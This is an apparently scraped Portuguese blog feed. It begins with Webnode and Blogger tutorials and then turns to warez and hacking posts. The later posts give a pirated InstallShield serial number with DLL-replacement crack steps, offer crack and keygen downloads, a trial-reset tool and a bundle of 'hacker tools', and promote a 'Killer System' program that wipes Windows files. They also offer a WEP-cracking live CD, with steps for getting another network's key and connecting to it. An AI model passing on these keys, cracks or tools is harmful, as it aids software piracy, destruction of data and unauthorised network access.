http://paginas.fe.up.pt/~gil/ensino/prg/files/cygwin1.5.5-1.zip

Poderar gostar de;

Como adicionar imagens junto ao texto no Webnode

Thu, 22 Mar 2012 14:38:00 +0200

Colocar imagens junto ao texto em um artigo pode melhorar a sua leitura e auxiliar principalmente quando o assunto se trata de uma explicação de difícil entendimento como tutoriais.

Neste artigo mostrarei com você pode fazer isso no Webnode.

Fazendo o upload e inserindo as imagens

Dentro do editor de texto presente em uma página do seu site clique sobre um quadrado com uma imagem de montanhas. Observe a imagem:

No painel que se abrir selecione a imagem que deseja adicionar ou faça o upload de uma clicando em “Fazer upload de imagens” no canto superior esquerdo e logo em seguida procure pela imagem armazenada no seu computador.

Após a imagem carregar selecione-a no painel e clique em “Inserir”.

Agora você já tem uma imagem junto ao texto, no entanto, você ainda pode alterar o tamanho dela, colocar uma breve descrição e escolher o seu alinhamento clicando com o botão direito do mouse sobre a imagem e na opção “Formatar imagem”. Na janela que abrir altere as configurações a seu gosto.

Salve as modificações em “Salvar” e salve o artigo clicando em “Salvar e Fechar”.

---

E você gostou desse artigo? Deixe sua opinião no sistema de comentários abaixo.

Poderar gostar de;

2Leep - Divulgue melhor suas postagens dentro do seu blog

Tue, 20 Mar 2012 07:04:00 +0200

O papel principal dos buscadores para um site∕blog é fazer o primeiro contato do visitante com sua página. É trazer os famosos “paraquedistas” para o seu conteúdo. Após esse primeiro contato, só cabe a você, conquista-los. Transformando-os em: “usuários∕visitantes fiéis”.

Uma das formas de conquistar o visitante é apresentar textos, novidades, assuntos, etc. Algo de relevância para aquele público alvo. De forma que as pessoas fiquem presas e criem admiração não só por um texto, mas pelo conjunto de textos oferecidos pelo blog.

Divulgar outras postagens com imagem e o título logo abaixo de todas as suas publicações é uma forma muito eficiente! Por isso uso e recomendo o 2Leep! Um widget simples e objetivo!
O 2Leep mostra de forma aleatória um número X (definido por você) de postagens, criando assim uma divulgação de todos os arquivos. E o melhor: Não há dificuldade alguma na configuração e instalação.

Os diferenciais do 2Leep

1 – Organização
2 – Estabilidade
3 – Fácil instalação
4 – Acompanhamento estatístico

Conheça outras formas de divulgar suas postagens dentro do seu próprio blog:

Configuração e Instalação:

1) Entre no site 2Leep;

2) Clique em “iobter um widget”;

3) Preencha o campo com o endereço do seu blog;

4) Escolha um modelo de widget;

5) Coloque seu e-mail e uma senha para cadastro no site. Esse cadastro é importante para configuração, edição e acompanhamento de estatísticas do widget.

6) Termine de configurar o widget:
- Tamanho do widget
- Tamanho da imagem

7) Após configurar, visualizar e aprovar, selecione o código e copie (Ctrl + c).

Instalação no Blogger:

1) Faça login no Blogger, clique em “Visão Geral” no blog que você quer adicionar o gadget.

2) Clique em “Modelo” e no final da página clique em “Editar Modelo”.
Caso não tenha essa opção liberada para você, faça o mesmo procedimento usando o Blogger in Draft (painel de testes do Blogger).

3) Procure (Ctrl + f) por:

ou

ou

ou outro lugar que pretende adicionar o código

4) Cole o código gerado pelo site 2Leep logo abaixo.

Caso você queira que o gadget apareça apenas quando abrir uma postagem, leia:

Ocultar conteúdo da página inicial no Blogger

5) Salve as configurações.

Instalação no WordPress:

Você pode adicionar manualmente caso conheça um pouco da plataforma ou você pode adicionar o plugin do próprio site que faz todo o trabalho para você. Clique no ícone do WordPress acima do código gerado e siga os passos.

Poderar gostar de;

Como colocar meu site no Ar/Publicar

Tue, 20 Mar 2012 04:30:00 +0200

Após cada postagem sua no site, irá aparecer isso:

quando você clicar em "publicar" irá aparecer uma janela assim:

clique em ok e seu site já estará diponível para visualização na web.

FONTE: Dicasparasite

Poderar gostar de;

Adicionar Twitter ao seu site Webnode

Tue, 20 Mar 2012 04:06:00 +0200

1° - Pegue o nome do Twitter que você deseja, no caso eu peguei o twitter oficial do @Webnode.

2° - Simplesmente cole o nome do twitter como se ver na imagem abaixo.

3° - Após clicar em "OK" o seu site já estará com twitter.

Poderar gostar de;

Como colocar uma caixa de aviso ao entrar no site

Tue, 20 Mar 2012 00:06:00 +0200

Apesar de não ser recomendado algumas pessoas adicionam uma caixa que aparece quando alguém entra no blog ou site. Muitos dessas caixas ou pop-ups contem avisos ou novidades do site. Se você deseja colocar essa caixa de aviso confira o tutorial abaixo.

Exemplo da caixa de aviso

Ps. Alguns programas de afiliados proíbem o uso desses pop-ups, um exemplo deles é o Adsense, portanto tome cuidado para não ter sua conta bloqueada e seus ganhos perdidos.

Código:

Primeiramente copie o código abaixo.

Onde está escrito “Frase” mude para a frase que você deseja exibir. Agora é só colar o código editado no seu site.

Como colocar no Webnode:

Para colocar no Webnode é bem simples. Acesse o painel de edição do seu site e arraste uma caixa de Widgets para dentro do template do site. Cole o código e adicione em “Ok”.

Como colocar no Blogger:

Acesse o painel de edição do seu blog no Blogspot. Clique no botão “Layout” e logo em seguida em “Adicionar um Gadget”. Busque pelo Gadget “HTML/JavaScript” e cole o código dentro dele. Clique em “Salvar”.

Gostou do código? Deixe um comentário com as suas críticas e sugestões.

Fonte: Dicas para Webnode

Poderar gostar de;

Como instalar um pop-up de captação de E-mail no site

Mon, 19 Mar 2012 23:46:00 +0200

Recentemente publiquei aqui no Dicas para Webnode um artigo que ensina como Cadastrar o Feed do site feito no Webnode no FeedBurner.

Hoje vou mostrar como adicionar um pop-up que permite os leitores se cadastrem no seu Feed e passem a receber novidades por e-mail. Este pop-up é o mesmo utilizado aqui no Dicas para Webnode e fica no canto inferior da tela, sendo impossível não percebê-lo.

Nota: O pop-up aqui utilizado foi encontrado na internet, no entanto o autor deste grandioso widget não foi encontrado, caso você seja o autor, por favor, deixe nos comentários o seu nome e uma comprovação da titularidade, para que sejam dados os devidos créditos.

Como configurar o captador de e-mail

Primeiramente baixe os arquivos que contem o pop-up aqui.

Após o Download descompacte os arquivos (clique sobre o arquivo com o botão direito do mouse logo em seguida em “extrair arquivos”). Há três arquivos que é o rss-feed-gif.gif, closeicon.gif, feed-rss-dicasparawebnode.

Você deve publicar as imagens rss-feed-gif.gif e closeicon.gif no seu site e copiar seus respectivos endereços.

Logo em seguida clique com o botão direito do mouse no arquivo feed-rss-dicasparawebnode.html e em “abrir com...” e selecione o “Bloco de Notas”.

No final do código há algumas opções que devem ser alteradas de acordo com o endereço do FeedBurner e os links das imagens publicadas anteriormente.
Todos os locais que devem ser modificados estão abaixo da frase "ISSO E UM COMENTARIO PERSONALIZE ESSA LINHA ABAIXO".

Nos locais que possuem a palavra “DicasparaWebnode” você deve modificar pelo seu endereço no FeedBurner. Já nos endereços "http://www.seusite.com/rss-feed-gif.gif" e "http://www.seusite.com/closeicon.gif" devem ser modificados pelos endereços das imagens.

Como colocar no Webnode

Depois de feitas as alterações você deve copiar o código e acessar o painel de edição do seu site. Nele você deve clicar em “Modelo” e em “Configurações avançadas”.

No novo painel que abrir clique em “Widgets” e selecione a opção “Incorporar Código”. Cole o código dentro da caixa que abrir e clique em “OK”.

Como colocar no Blogger

No painel de edição do seu site no Blogger clique em Modelo e logo em seuida em Editar HTML. No seu HTML procure pela tag e cole o código acima dela.

Se ocorrer algum erro...

Faça o teste com o seu pop-up e se o FeedBurner mostrar uma mensagem que o cadastro via em e-mail não está ativado, acesse sua conta no FeedBurner clique em “Publize” ---> “Email Subscripitons” e na opção “Activate”.

E você gostou do artigo? Deixe sua opinião abaixo e/ou publique-o nas suas redes sociais.

Poderar gostar de;

Onde comprar um domínio para o Site

Mon, 19 Mar 2012 23:42:00 +0200

Apesar de não ser levado em consideração pela maioria dos blogueiros que iniciaram recentemente na internet, a compra de um domínio próprio pode melhorar o posicionamento do site nos buscadores e aumentar o numero de visitas diárias.

Registrar um domínio é um dos primeiros passos que estabelecem o seu blog como confiável para as pessoas e elevam a credibilidade do conteúdo. Neste artigo citarei alguns dos principais serviços de hospedagem nacionais e internacionais.

Vale ressaltar que muitas das plataformas que permitem criar sites gratuitamente (Webnode, Blogger, Weebly entre outras), já oferecem essa opção, onde além de não ser necessário configurar nada no blog, algumas funcionalidades no painel de edição são desbloqueadas.

Empresas Nacionais

Muito buscadas pelas pessoas que não possuem um cartão de crédito internacional ou não entendem o Inglês, as empresas de hospedagem brasileiras são a solução.

UOL Host

O UOL Host vende desde domínios internacionais até nacionais, além disso permite efetuar o pagamento através de boleto bancário.

O domínio .com.br sai por R$29,90 ano e os internacionais .com e .net é vendido por R$14,90 ano.

Registro.BR

Até pouco tempo essa era uma das únicas empresas brasileiras que vendiam os domínios nacionais.

Atualmente o dominio .br é vendido por R$30,00 reais pelo período mínimo de 3 anos e o .com.br pelo período de 1 ano está com o preço de também R$30,00.

IG Empresas

Está oferecendo domínios .com/.net por R$8,90 por ano. Já os domínios .br.com está no valor de R$69,90/ano e o .com.br por R$30,00/ano. Além disso, a IG Empresas vende domínios .org/.info/.name por R$15,00 ano.

Não sendo imparcial com nenhuma das empresas, a IG Empresas foi a que encontrei mais recomendações em minhas pesquisas.

Empresas Internacionais

As empresas internacionais na maioria das vezes só recebem os pagamentos através do cartão de crédito internacional ou o PayPal, entre outros tipos de pagamentos. Caso não tenha nenhum dos itens citados anteriormente é recomendado optar pelas nacionais.

NameCheap

Vende domínios .com/.net por $10,69 doláres e .info por $2,69 doláres. Oferece também outros domínios mas que fazem parte dos EUA.

Nota: Até o exato momento que publiquei este artigo, não conheço outra empresa internacional confiável que oferece domínios. Contudo se você leitor tem um domínio em alguma empresa que se encaixe nesta categoria, por favor, deixe um comentário logo abaixo.

---

E você já possui um domínio próprio? Diga-nos em que ele melhorou no seu site e sua critica (prós, contras) sobre a empresa.

Poderar gostar de;

Como criar Subpágina no Webnode

Mon, 19 Mar 2012 21:31:00 +0200

Apesar de gratuito o Webnode oferece diversas ferramentas que ajudam na organização do site. Um exemplo disso é permitir que o usuário crie uma Subpágina de uma Página já existente, onde você pode organizar seus artigos em diferentes categorias como por exemplo dicas, jogos, diversão e etc.

Para fazer isso clique sobre o botão “Novo” localizado no canto superior esquerdo dentro do painel de edição.

No painel que abrir coloque um titulo para a nova página, selecione em qual categoria ela será criada (artigos, listas, FAQ, etc.) e clique sobre o botão na parte “Página Principal” como mostrado na imagem.

Uma nova janela abrirá para que você selecione a página na qual será colocada a Subpágina.

Após clicar em “Salvar” a subpágina aparecerá abaixo da página escolhida no menu de navegação e/ou ela será mostrada em uma lista quando posicionado o mouse.

exemplo do menu com uma subpágina

E você conhecia esta funcionalidade? Deixe um comentário logo abaixo com a sua resposta e/ou divulgue este artigo.

Fonte: Dicas para Webnode

Poderar gostar de;

Com editar as propriedades das páginas no Webnode

Mon, 19 Mar 2012 21:23:00 +0200

A plataforma Webnode possui várias ferramentas que às vezes não são notadas pelo usuário, um exemplo delas é a opção de poder editar as propriedades de uma página.
Essa funcionalidade permite editar o titulo, endereço na web, adicionar tags entre outras opções, que podem ajudar a melhorar o posicionamento do seu site nos buscadores.

Para fazer isso siga os passos a seguir.

Editar as propriedades de uma página

Primeiramente acesse o painel de edição do seu site e busque pela página que desejar editar. Para facilitar utilize a ferramenta “Ir à página” no canto superior esquerdo.

Após estar na página clique sobre o botão “Propriedades” que aparece no menu superior.

Um novo painel surgirá na tela, como o mostrado na imagem abaixo. Agora é só modificar as colunas de acordo com a sua preferência.

Função de cada propriedade da página:

Titulo – Titulo que aparece no artigo.

Endereço Web – É o endereço que aparece no navegador (barra de endereço). O ideal é que ele seja curto.

Página Mãe – Página na qual o artigo está relacionado.

Titulo do Separador – Titulo que aparece no navegador e nos resultados de buscar. Procure adicionar sempre palavras relacionadas ao artigo.

Palavras Chave – Palavras que ajudam a melhorar a indexação da página.

Descrição – Breve descrição que é exibida nos resultados de buscas.

Exibir página no Menu – Se a página deve ser exibida ou não no menu do site.

Exibir a página no mapa do site – Recomendado deixar marcado o “sim”, pois ela ajuda os buscadores na hora da indexação da página.

Etiquetas – Utilizada pelo Webnode para organizar as páginas.

Após configurar tudo clique no botão “OK”.

---

E você gostou da dica? Então deixe um comentário com a sua opinião e/ou divulgue-o nas suas redes sociais.

Poderar gostar de;

Coloque uma galeria de imagens no seu site no Webnode

Mon, 19 Mar 2012 19:32:00 +0200

Apesar de ainda não ser possível colocar uma apresentação de slides no Webnode, a plataforma disponibiliza outra ferramenta que pode “quebrar um galho”. Trata-se da “Galeria de Imagens” onde você adiciona várias imagens em mesmo local do site que podem ser visualizadas pelas pessoas.

Automaticamente o Webnode reduz o tamanho da imagem e adiciona todas elas em um mesmo local, onde quando clicadas aparecem em tela cheia (Fullscreen). Veja um exemplo da galeria em Fullscreen na imagem abaixo:

exemplo da galeria de imagens disponível no Webnode

Como configurar e adicionar a galeria

Dentro do painel de edição do seu site no Webnode, clique sobre o botão “Galeria” ou “Galeria de Imagens”.

Abrirá um novo painel. Nele você deve adicionar todas as imagens que deseja exibir na galeria, para fazer isso clique sobre “Carregar Imagens”.

Selecione na caixa quais imagens deseja exibir e clique em “Fechar”.

Agora todas as fotos que você colocou aparecerão em uma galeria dentro do seu site, você pode adicionar ou remover as imagens à hora que quiser.

Ps. Essa galeria disponível no Webnode é a mesma utilizada aqui no blog, ou seja, é uma das melhores para sites ou blogs, principalmente porque economiza espaço dentro do template e ajuda na organização.

Poderar gostar de;

Como mudar o plano de fundo (background) no Webnode

Mon, 19 Mar 2012 19:13:00 +0200

Este artigo foi sugerido por email por um usuário do site Hacker Absoluto que tem duvidas de como trocar o plano de fundo do seu blog criado no Webnode.
O problema é que o Webnode não permite acesso ao HTML do site e somente ao CSS, que é um pouco mais complicado de se mexer, mas isso não implica que seja impossível de se realizar a troca.

Tutorial:

Antes de mexer no template do site, você necessita ter a imagem que deseja como plano de fundo hospedada em algum servidor (pode ser até no próprio Webnode). Com a imagem hospedada e o endereço copiado siga os passos a seguir:

1. No painel de edição do site clique em "Modelo"--->"Configurações avançadas".

2. Depois em Editar CSS.

3. Procure pela tag body { (aperte CTRL + F no seu teclado para facilitar).
4. Próximo da palavra "background" entre parênteses está o endereço do plano de fundo atual do seu site. Por padrão ele pode ser ../img/bg.gif ou outro dependendo do seu template.
5. Exclua esse link e cole o endereço da imagem que quer ter como plano de fundo do blog. Após isso clique em salvar e visualize o resultado.

6. Mas para que a imagem fique bem colocada no fundo do site, eu recomendo que você modifique um código que fica na frente do link da imagem. Veja as funções de cada código e aplique aquele de seu interesse:

A. repeat-y left top (a imagem se repetira Y vezes no template na vertical)
B. repeat-x center top (a imagem se alinhará no centro do site mas não se repetirá)
C. repeat-x left top (a imagem se repetirá X vezes na horizontal do site)
D. repeat (a imagem se repetira X e Y vezes tanto na vertical como horizontal dentro do template do site)

7. Aplique o comando que desejar e clique em salvar. Lembre-se que deve-se retirar o comando atual do template e colar o novo.
Por causa das inúmeras variações eu recomendaria o comando repeat que repetirá a imagem para todos os lados do fundo.

Dica: Se criado uma imagem degradê não daria para perceber que o fundo foi criado pela junções de inúmeras da mesma imagem.

Plano de fundo aplicado e observações

Pronto agora o seu site estará com um fundo personalizado e com a sua cara.

Atenção: Em alguns templates a mudança no CSS não é aplicada o que pode ser um erro do Webnode ou a impossibilidade de mudança mesmo, sendo assim necessário escolher outro template que aceite a mudança no fundo.

E você gostou da dica? Deixe um comentário e/ou divulgue este artigo nas redes sociais.

Poderar gostar de;

Como cadastrar o Feed do site no Webnode no FeedBurner

Mon, 19 Mar 2012 19:03:00 +0200

Se você tem um site/blog no Webnode poderá então cadastrar o Feed dele no FeedBurner e poder disfrutar de algumas estatísticas importantes como numero de pessoas inscritas, cliques recebidos e ainda poder ganhar dinheiro monetizando os Feeds com o Google Adsense.

O que é o FeedBurner?

Ferramenta da Google muito útil para websites e blogs, onde ele serve para que não haja a necessidade de o leitor visitar o site todas as vezes que quiser ficar informado sobre os últimos artigos/novidades.

Como saber o seu Feed no Webnode

Antes de cadastrar o site no FeedBurner é necessário descobrir o Feed dele. Para fazer isso acesse o editor do seu site no Webnode e clique sobre a palavra RSS que fica no canto superior direito do template.

Logo em seguida abrirá uma página listando todos os Feeds de artigos existentes no site. Você deve escolher qual deseja cadastrar e copiar o seu endereço URL.

Como cadastrar no FeedBurner

Você primeiramente deve possuir uma conta no FeedBurner, que pode ser criada a partir de uma conta do Youtube, Orkut, Google Sites, Google Plus, entre outros.

Com a conta criada no FeedBurner cole o feed do site na caixa “Burner a feed right this instant” logo na página inicial. Em seguida clique em “Next”.

Na página seguinte coloque um nome para o novo feed em “Feed title” e um endereço personalizado na caixa “Feed Address”. Clique em “Next”.

Nota: No meu exemplo o nome do Feed escolhido foi testedicasparawebnode que ficou com o seguinte endereço feeds.feedburner.com/testedicasparawebnode .

Pronto você acaba de criar um novo endereço de Feed, no entanto ha outras inúmeras funcionalidades que podem ser conferidas no assistente do FeedBurner, clicando em “Next”.

Agora é só divulgar o endereço do seu Feed para que as pessoas possam se inscrever e passar a acompanhar o seu website através dele.

Como configurar o Feed no Webnode

Com o endereço de feed criado você ainda precisa alterar os endereços de feed padrão do site, para que o FeedBurner passe a contabilizar todos os artigos e leitores.

Para fazer isso acesse o painel de edição do seu site no Webnode, clique sobre o botão “Configurações” e logo após em “RSS e Favoritos” e no botão “Configurar RSS”.

No painel que abrir marque a opção “Artigo Completo”, adicione uma mensagem que será exibida em todos os endereços de Feed e cole em todos os feeds que existirem no seu site o endereço de feed cadastrado no FeedBurner.

---

Agora é só divulgar o endereço do feed do seu site para os leitores e/ou utilizar alguns widgets fornecidos pelo FeedBurner que permitem dentre outras coisas adicionar uma caixa para o cadastramento de e-mails dos leitores e etc.

E você gostou do artigo? Então deixe um comentário com a sua opinião logo abaixo e não se esqueça de se inscrever no Feed do Hacker Absoluto.

Fonte: Dicas para Webnode

Poderar gostar de;

MyLanViewer Portable - Portatil

Wed, 14 Mar 2012 09:33:00 +0200

MyLanViewer um scanner para sua rede doméstica. Examina e apresenta a disponibilidade de computadores na rede, seus nomes, endereços IP e MAC, compartilhar, e outros detalhes técnicos para cada computado

Poderar gostar de;

MyLanViewer 4.8.9 + Crack + Keygen

Wed, 14 Mar 2012 09:30:00 +0200

Poderar gostar de;

Material Hacker 2011 completo

Wed, 14 Mar 2012 09:26:00 +0200

Descrição: Material Hacker 2011 completo, contendo ferramentas para todo tipo de hacker, desde iniciantes até intermediarios, programas e scripts exclusivos, considerado um dos melhores e mais completo material Hacker disponivel na , produzido pelo Hacker @WorldAnon

Mais de 300 Ferramentas Hacker

Download Parte 1

Download Parte 2

Poderar gostar de;

Killer System - Destruir o Windows

Wed, 14 Mar 2012 09:21:00 +0200

Killer System Com esse programa, ao executa-lo irá apagar todos os arquivos do windows, danificando o sistema baixar destruir pc windows.

Poderar gostar de;

MyLanViewer + serial + Crack

Wed, 14 Mar 2012 09:17:00 +0200

Poderar gostar de;

F.B.I Field Kit AIO

Wed, 14 Mar 2012 08:58:00 +0200

Contendo os programas usado pelo FBI:

    Frramentas Forensics

    Sleuth Kit - Forensics Kit
    Py-Flag - Forensics Browser
    Autopsy Forensics Browser for Sleuth Kit
    dcfldd - DD Imaging Tool command line tool and also works with AIR
    AIR - Forensics Imaging GUI
    MD5DEEP - MD5 Hashing Program
    NETCAP - Command Line
    CRYPTCAT - Command Line
    NTFS - Tools
    QTPARTED - GUI Partitioning Tool
    REGVIEWER - Windows Registry Viewer
    X-WAYS WINTRACE
    X-WAYS WINHEX
    X-WAYS Forensics
    R-STUDIO EMERGENCY( Bootable recovery media Maker)
    R-STUDIO NETWORK EDITION
    R-STUDIO RS AGENT
    NET RESIDENT
    FACES 3 FULL(600 Megas)
    ENCARASE 4.20

    FIELD KIT MANUALS

    INCIDENT RESPONSE- COMPUTER Forensics
    XOMPUTER CRIME INVESTIGATION
    Forensics PATHOLOGY
    Forensics INTERPRETATION OF EVIDENCE
    WINDOWS Forensics
    COMPUTER Forensics-AN ILLUSTRED DICTIONARY
    COMPUTER Forensics-JUMPSTART

    PROGRAMA ADICIONAIS BOOT DVD:

    GENTOO LINUX 2.6 KERMEL - OPYMIZED FORENSICS USE
    XFCE - GUI
    APACHE2 - SERVE
    MYSQL PHP 4
    OPEN OFFICE
    GIMP - GRAFICS PROGRAM
    KSNAPSHOT - SCREEN CAPTURE PROGRAM
    MOZILLA
    GNOME CD MASTER
    K3B - CD BURNER
    XMMS - MEDIA PLAYER
    POTHOLE - GENTPP GRAPHICS PACKAGE MANAGER
    KARCHIVER - GZIP GUI
    SECURITY TOOLS:
    ENTHRAPE - GUI NETWORK TRAFFIC MONITOR
    CLAMV - ANTI VIRUS
    SNORT - COMMAND LINE

Download

Part 1
Part 2
Part 3
Part 4
Part 5
Part 6
Part 7
Part 8
Part 9
Part 10
Part 11
Part 12

Poderar gostar de;

Parar tempo de programas Time Stopper 1.2

Wed, 14 Mar 2012 03:12:00 +0200

O que é Time Stopper ?
Time Stopper é um software que impede que o tempo corra em softwares.
Por que razão parar o tempo?
Quando você para o tempo, você pode usar suas versões trial para sempre.
Será prejudicial a meu sistema?
Não. Você só irá parar o tempo do software para que a versão trial não expire.
Quantas versões trial posso utilizar simultaneamente?
Você pode usar qualquer número de softwares em versões trial.
Tamanho: 1 MB
Hospedagem: Easyshare

Poderar gostar de;

Time Cafe 4.2.1 +Crack +Feygen +Tutorial de Ativação

Wed, 14 Mar 2012 03:03:00 +0200

Sistema para gerenciamento de Cybercafés, Lanhouses e outros locais com micros ligados em rede para acesso público. Monte seu próprio negócio utilizando o TimerCafé. O Timer Café apesar de ser grande e completo é muito simples de operar.Você começa definindo no módulo Administrador os preços que irá cobrar por tempo de utilização dos micros e o custo de impressão por página.
Tamanho: 39 MB
Hospedagem: Easy-Share

Poderar gostar de;

InstallShield Premier 2009 + Crack

Wed, 14 Mar 2012 02:49:00 +0200

O InstallShield é uma ferramenta muito bem conceituada no mercado devido a sua grande flexibilidade na criação de instaladores. Oferece grande versatilidade e permite desenvolver instaladores para as mais variadas plataformas e sistemas operacionais, sempre prezando pela qualidade do produto final.

Além de recursos eficazes, contém adicionais que promovem maior agilidade no desenvolvimento dos projetos e fornecem soluções práticas às necessidades específicas dos desenvolvedores, merecendo destaque o TrialWare e o Collaboration Design. Essa oferece um passo-a-passo para a criação de versões teste completamente funcionais e sem alteração do código fonte do software. Já esta, é responsável pela divisão de grandes projetos em pedaços menores, acrescentando conceitos de Assemblies.

Eficaz e de fácil uso:
Quem ainda não está muito habituado com este tipo de programa, pode facilmente criar seus instaladores através do assistente exibido pelo programa. Muito bem ilustrado e organizado, numa interface moderna e de fácil compreensão. Mesmo sendo de fácil uso, possui suporte para as mais recentes e inovadoras tecnologias, incluindo o novo Microsoft MSI 3.0.

Uma instalação robusta e sem erros é imprescindível para o sucesso do seu software e para isso, pode contar com o InstallShield.

1) Abra e instala ( IS2009Premier.exe ) aplicação
entre com o serial numero: 445D9CC-625-710008EFC6
ou coloque tudo ( xxxxxxx-xx-xxxxxxxxxx )

2) copie o craked .dll file para ( c:InstallShield2009SystemISUIServices.dl l ) ou no diretorio que vc instalou e subistitua por ele
para maiores explicações readme junto na pasta.
preço $499,99.

Nome: InstallShield Premier 2009
Fabricante: Macrovision
Estilo: Utilitário
Sistema Operacional: Sistema: Windows 98/Me/2000/XP/2003/Vista
Ano de Lançamento: 2008

Tamanho: 172 Mb
Formato: Rar
Facilidade de Uso: 9
Interface Gráfica: 9
Número de Mídias: 1
Idioma: Inglês

parte 1

http://www.megaupload.com/?d=THN6NQ41

parte 2

http://www.megaupload.com/?d=NNUUGUXU

Poderar gostar de;

WiFi Slax

Wed, 14 Mar 2012 02:34:00 +0200

Esta versão é para todos os sistemas exceto com os sistemas Intel B / G wireless cards (IPW2200).
-- Live CD com todas as ferramentas que você precisa para cortar uma WLAN / ponto de acesso sem fio - Linux Live-CD - OS corre a partir do CD - 635 mb -. Iso
-- Também usada pelo FBI.

WEP Hacking - a próxima geração

Criptografia WEP é um sistema, baseado no RC-4 cifra, que está disponível em todas as 802.11a, b, g produtos sem fio. WEP utiliza um conjunto de bits chamado uma chave para codificar a informação de dados frames, uma vez que deixa o ponto de acesso ou cliente adaptador e embaralhada a mensagem é então descodificada pelo receptor.

Ambos os lados têm de ter a mesma chave WEP, que é geralmente um total de 64 ou 128 bits. Um semi-aleatório 24 bits um número chamado Inicialização Vector (IV), faz parte da chave, de modo 64 bits uma chave WEP realmente contém apenas 40 bits de criptografia forte ao mesmo tempo uma chave de 128 bit tem 104. O IV é colocado no cabeçalho frames criptografada, e é transmitido no formato texto.

Tradicionalmente, cracking chaves WEP tem sido um processo lento e aborrecido. Um atacante teria de captura de centenas de milhares ou milhões de maços de um processo que poderia demorar várias horas ou mesmo dias, dependendo do volume de tráfego que passa através da rede sem fio. Depois basta pacotes foram capturados, um programa como o WEP cracking Aircrack seria utilizado para encontrar a chave WEP.

- Rápido para a frente para o Verão passado, quando o primeiro da mais nova geração de ferramentas WEP cracking apareceu. Esta geração actual utiliza uma combinação de técnicas estatísticas centrada na única IVs capturado e dicionário ataques de força bruta para quebrar chaves WEP 128 bits em minutos em vez de horas. Tal como Agente Especial Bickers notar, does'nt Não importa se você usa 128 bits chaves WEP, você está vulnerável!

Criptografia WEP é um sistema, baseado no RC-4 cifra, que está disponível em todas as 802.11a, b, g produtos sem fio.

WEP utiliza um conjunto de bits chamado uma chave para codificar a informação de dados frames, uma vez que deixa o ponto de acesso ou cliente adaptador e embaralhada a mensagem é então descodificada pelo receptor.

Ambos os lados têm de ter a mesma chave WEP, que é geralmente um total de 64 ou 128 bits.

Um semi-aleatório 24 bits um número chamado Inicialização Vector (IV), faz parte da chave, de modo 64 bits uma chave WEP realmente contém apenas 40 bits de criptografia forte ao mesmo tempo uma chave de 128 bit tem 104.

O IV é colocado no cabeçalho frames criptografada, e é transmitido no formato texto.

Tradicionalmente, cracking chaves WEP tem sido um processo lento e aborrecido.

Um atacante teria de captura de centenas de milhares ou milhões de maços de um processo que poderia demorar várias horas ou mesmo dias, dependendo do volume de tráfego que passa através da rede sem fio.

Depois basta pacotes foram capturados, um programa como o WEP cracking Aircrack seria utilizado para encontrar a chave WEP.

- Rápido para a frente para o Verão passado, quando o primeiro da mais nova geração de ferramentas WEP cracking apareceu.

Esta geração actual utiliza uma combinação de técnicas estatísticas centrada na única IVs capturado e dicionário ataques de força bruta para quebrar chaves WEP 128 bits em minutos em vez de horas.

Instruções básicas:

1) iniciar a partir do CD
2) obter a chave WEP
3) anotá-la
4) reiniciar para Windows
5) conectar usando chave WEP.

parte 1
http://rapidshare.com/files/137246019/live.cd-wireless.hacking.FBI.part1.rar

parte 2
http://rapidshare.com/files/137246001/live.cd-wireless.hacking.FBI.part2.rar

parte 3
http://rapidshare.com/files/137245953/live.cd-wireless.hacking.FBI.part3.rar

parte 4
http://rapidshare.com/files/137248764/live.cd-wireless.hacking.FBI.part4.rar

parte 5
http://rapidshare.com/files/137248765/live.cd-wireless.hacking.FBI.part5.rar

parte 6
http://rapidshare.com/files/137248782/live.cd-wireless.hacking.FBI.part6.rar

parte 7
http://rapidshare.com/files/137248649/live.cd-wireless.hacking.FBI.part7.rar

Poderar gostar de;

Criptografia TrueCrypt

Sun, 11 Mar 2012 17:09:00 +0200

Um assunto que chama muito a atenção de usuários de informática é a segurança de arquivos e pastas pessoais, como proteger esses arquivos e evitar que outras pessoas leiam, vejam, escutem ou acessem seus dados ou arquivos? A resposta exata para essa pergunta seria a Criptografia.

Com a criptografia você consegue colocar senha em pastas e arquivos ou até mesmo bagunçar completamente as informações de um arquivo de texto por exemplo. Dessa forma você consegue evitar que pessoas não autorizadas, tenham acesso a seus arquivos. Como esse não é um post técnico sobre criptografia, eu não falarei sobre algoritmos de criptografia e nem como eles podem ser quebrados ou decifrados, vamos nos apegar apenas a criptografia na prática.

Hoje em dia existem vários programas de criptografia, que podem ser usados em vários momentos, dentre esses programas um que se destaca é o TrueCrypt. Com o TrueCrypt você consegue criar volumes criptografados protegidos por senha, esses volumes são como HDs virtuais, aonde você pode armazenar todos os arquivos e pastas que você queira proteger.

A utilização do TrueCrypte é muito simples. Primeiro você deve criar um volume criptografado, durante a criação desse volume, será pedido uma senha e informações de tamanho para o volume, além disso também terá algumas opções de criptografia, como tamanho e algoritmo. Após as configurações terem sido feitas, será gerado um arquivo que será responsável por armazenar todos os arquivos e pastas que você colocar no volume criado, na verdade, esse arquivo é o volume que você acabou de criar.

Com o volume criado, basta você monta-lo utilizando o TrueCrypt e abri-lo dando dois cliques no volume ou entrando em “Computador / Letra do volume“. Quando você quiser criptografar um arquivo ou pasta, basta copia-lo para dentro do volume, ao término desse processo desmonte o volume, dessa forma o seu volume conterá todos os arquivos que você copiou para dentro dele e só poderá ser montado novamente com a utilização do TrueCrypt, utilizando a senha que você forneceu na criação do volume.

Um ponto legal do TrueCrypt, é que você pode criar o volume do tamanho que você quiser, sendo assim, você pode criar por exemplo um volume com metade do tamanho do seu pendrive e sempre leva-lo no pendrive, junto é claro com o instalador do TrueCrypt, para que você possa descriptografa-lo, a outra metade do espaço do pendrive, você pode utilizar para armazenar arquivos que não precisam ser criptografados.

Além dessa opção de criar volumes criptografados, o TrueCrypt também possui opções de criptografia de dispositivos como HDs, e partições como as partições FAT dos pendrives e as partições NTFS do Windows.

Atualmente o TrueCrypt esta na versão 7.1 e esta disponível para Windows, MAC e Linux, para baixa-lo acesse o site oficial da ferramenta.

Se você procura por algum programa que proteja os seus arquivos de curiosos, o TrueCrypt é uma ótima opção, se você esta estudando hacking, não deixe de testar essa ferramenta, afinal, todo Hacker antes de saber invadir, tem que saber se defender.

Em breve eu farei alguns tutoriais mostrando como utilizar o TrueCrypt no Windows, MAC e Linux.

Poderar gostar de;

Download gratuito do Windows 8

Sun, 11 Mar 2012 17:01:00 +0200

